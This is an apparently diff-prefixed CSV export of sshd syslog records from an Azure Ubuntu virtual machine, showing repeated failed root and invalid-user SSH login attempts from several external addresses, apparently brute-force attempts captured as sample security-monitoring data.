+14695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:55,UbuntuDevEnv,2019-06-26 05:05:54,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55288 ssh2,5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55288,,
+14696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:01,UbuntuDevEnv,2019-06-26 05:06:01,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:01,UbuntuDevEnv,2019-06-26 05:06:01,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 55288 ssh2 [preauth],5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55288,,
+14698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:01,UbuntuDevEnv,2019-06-26 05:06:01,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 55288: Too many authentication failures [preauth],5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,55288,,
+14699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:01,UbuntuDevEnv,2019-06-26 05:06:01,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 55288 ssh2],5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55288,,
+14700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:01,UbuntuDevEnv,2019-06-26 05:06:01,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:02,UbuntuDevEnv,2019-06-26 05:06:02,auth,UbuntuDevEnv,info,Invalid user geosolutions from 5.135.161.72 port 45962,5414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geosolutions,5.135.161.7,45962,,
+14702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:02,UbuntuDevEnv,2019-06-26 05:06:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:02,UbuntuDevEnv,2019-06-26 05:06:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,5414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:04,UbuntuDevEnv,2019-06-26 05:06:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:05,UbuntuDevEnv,2019-06-26 05:06:04,auth,UbuntuDevEnv,info,Failed password for invalid user geosolutions from 5.135.161.72 port 45962 ssh2,5414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geosolutions,5.135.161.7,45962,,
+14706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:05,UbuntuDevEnv,2019-06-26 05:06:04,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 45962:11: Bye Bye [preauth],5414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,45962,,
+14707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:05,UbuntuDevEnv,2019-06-26 05:06:04,auth,UbuntuDevEnv,info,Disconnected from invalid user geosolutions 5.135.161.72 port 45962 [preauth],5414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geosolutions,5.135.161.7,45962,,
+14708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:05,UbuntuDevEnv,2019-06-26 05:06:05,auth,UbuntuDevEnv,info,Invalid user psybnc from 177.23.90.10 port 37406,5422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,psybnc,177.23.90.1,37406,,
+14709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:05,UbuntuDevEnv,2019-06-26 05:06:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:05,UbuntuDevEnv,2019-06-26 05:06:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,5422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:06,UbuntuDevEnv,2019-06-26 05:06:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 62325 ssh2,5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62325,,
+14712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:07,UbuntuDevEnv,2019-06-26 05:06:06,auth,UbuntuDevEnv,info,Failed password for invalid user psybnc from 177.23.90.10 port 37406 ssh2,5422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,psybnc,177.23.90.1,37406,,
+14713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:07,UbuntuDevEnv,2019-06-26 05:06:06,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 37406:11: Bye Bye [preauth],5422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,37406,,
+14714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:07,UbuntuDevEnv,2019-06-26 05:06:06,auth,UbuntuDevEnv,info,Disconnected from invalid user psybnc 177.23.90.10 port 37406 [preauth],5422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,psybnc,177.23.90.1,37406,,
+14715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:09,UbuntuDevEnv,2019-06-26 05:06:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 62325 ssh2,5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62325,,
+14716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:20,UbuntuDevEnv,2019-06-26 05:06:20,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 62325 ssh2 [preauth],5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62325,,
+14717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:20,UbuntuDevEnv,2019-06-26 05:06:20,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 62325 ssh2],5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62325,,
+14718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:20,UbuntuDevEnv,2019-06-26 05:06:20,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:20,UbuntuDevEnv,2019-06-26 05:06:20,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:20,UbuntuDevEnv,2019-06-26 05:06:20,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 62325: Too many authentication failures [preauth],5417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,62325,,
+14721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:23,UbuntuDevEnv,2019-06-26 05:06:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:26,UbuntuDevEnv,2019-06-26 05:06:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5007 ssh2,5495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5007,,
+14723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:40,UbuntuDevEnv,2019-06-26 05:06:39,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 5007 ssh2 [preauth],5495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5007,,
+14724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:40,UbuntuDevEnv,2019-06-26 05:06:39,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 5007 ssh2],5495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5007,,
+14725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:40,UbuntuDevEnv,2019-06-26 05:06:39,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 5007: Too many authentication failures [preauth],5495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,5007,,
+14726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:40,UbuntuDevEnv,2019-06-26 05:06:39,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:40,UbuntuDevEnv,2019-06-26 05:06:39,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:43,UbuntuDevEnv,2019-06-26 05:06:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:45,UbuntuDevEnv,2019-06-26 05:06:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12230 ssh2,5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12230,,
+14730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:48,UbuntuDevEnv,2019-06-26 05:06:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,5567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+14731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:48,UbuntuDevEnv,2019-06-26 05:06:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:48,UbuntuDevEnv,2019-06-26 05:06:47,auth,UbuntuDevEnv,info,Invalid user uy from 140.143.223.242 port 35112,5567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uy,140.143.223.2,35112,,
+14733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:48,UbuntuDevEnv,2019-06-26 05:06:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12230 ssh2,5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12230,,
+14734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:49,UbuntuDevEnv,2019-06-26 05:06:49,auth,UbuntuDevEnv,info,Failed password for invalid user uy from 140.143.223.242 port 35112 ssh2,5567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uy,140.143.223.2,35112,,
+14735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:50,UbuntuDevEnv,2019-06-26 05:06:50,auth,UbuntuDevEnv,info,Disconnected from invalid user uy 140.143.223.242 port 35112 [preauth],5567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uy,140.143.223.2,35112,,
+14736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:50,UbuntuDevEnv,2019-06-26 05:06:50,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 35112:11: Bye Bye [preauth],5567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,35112,,
+14737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:06:51,UbuntuDevEnv,2019-06-26 05:06:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12230 ssh2,5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12230,,
+14738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:00,UbuntuDevEnv,2019-06-26 05:06:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 12230 ssh2 [preauth],5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12230,,
+14739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:00,UbuntuDevEnv,2019-06-26 05:06:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:00,UbuntuDevEnv,2019-06-26 05:06:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:00,UbuntuDevEnv,2019-06-26 05:06:59,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 12230 ssh2],5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12230,,
+14742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:00,UbuntuDevEnv,2019-06-26 05:06:59,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 12230: Too many authentication failures [preauth],5559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,12230,,
+14743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:02,UbuntuDevEnv,2019-06-26 05:07:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:04,UbuntuDevEnv,2019-06-26 05:07:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19644 ssh2,5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19644,,
+14745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:13,UbuntuDevEnv,2019-06-26 05:07:09,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 19644 ssh2],5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19644,,
+14746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:13,UbuntuDevEnv,2019-06-26 05:07:13,auth,UbuntuDevEnv,info,Invalid user demo from 200.6.188.38 port 58354,5681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,200.6.188.3,58354,,
+14747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:13,UbuntuDevEnv,2019-06-26 05:07:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,5681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:13,UbuntuDevEnv,2019-06-26 05:07:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:13,UbuntuDevEnv,2019-06-26 05:07:13,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19644 ssh2,5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19644,,
+14750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:15,UbuntuDevEnv,2019-06-26 05:07:15,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 200.6.188.38 port 58354 ssh2,5681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,200.6.188.3,58354,,
+14751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:15,UbuntuDevEnv,2019-06-26 05:07:15,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 58354:11: Bye Bye [preauth],5681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,58354,,
+14752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:15,UbuntuDevEnv,2019-06-26 05:07:15,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 200.6.188.38 port 58354 [preauth],5681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,200.6.188.3,58354,,
+14753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:07:16,UbuntuDevEnv,2019-06-26 05:07:16,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19644 ssh2,5631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19644,,
